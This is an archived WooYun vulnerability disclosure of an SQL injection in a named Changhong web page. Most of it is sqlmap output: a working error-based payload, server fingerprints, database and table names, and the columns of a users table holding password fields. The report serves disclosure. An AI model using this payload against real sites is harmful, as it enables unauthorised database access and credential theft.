乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 细节已通知厂商并且等待厂商处理中 2015-10-18: 厂商已经主动忽略漏洞,细节向公众公开
点到为止了。
URL:
http://tc.changhong.com/metrology/jl.aspx?type=chemistry
type参数可盲注。
sqlmap identified the following injection points with a total of 289 HTTP(s) requests:---Parameter: type (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: type=chemistry' AND 5083=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5083=5083) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'IYqL'='IYqL---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: type=chemistry' AND 5083=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5083=5083) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'IYqL'='IYqL---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [10]:[*] linux_topic[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] softdown_database[*] source_code_database[*] tc_database[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: type=chemistry' AND 5083=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5083=5083) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'IYqL'='IYqL---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current user is DBA: Falsesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: type=chemistry' AND 5083=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5083=5083) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'IYqL'='IYqL---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: source_code_database[6 tables]+-------------------+| guestbook || project || project_sourecode || project_开发环境 || users || users_admin |+-------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: type (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: type=chemistry' AND 5083=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5083=5083) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'IYqL'='IYqL---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: source_code_databaseTable: users[12 columns]+--------------------+---------------+| Column | Type |+--------------------+---------------+| code | nvarchar || email | nvarchar || last_login_date | smalldatetime || memo | nvarchar || mobile | nvarchar || name | nvarchar || pass | nvarchar || pass_recovery_code | nvarchar || pass_rocovery_time | smalldatetime || qq | nvarchar || register_date | smalldatetime || u_id | int |+--------------------+---------------+
过滤等。
危害等级:无影响厂商忽略
忽略时间:2015-10-18 18:32
漏洞Rank:4 (WooYun评价)
暂无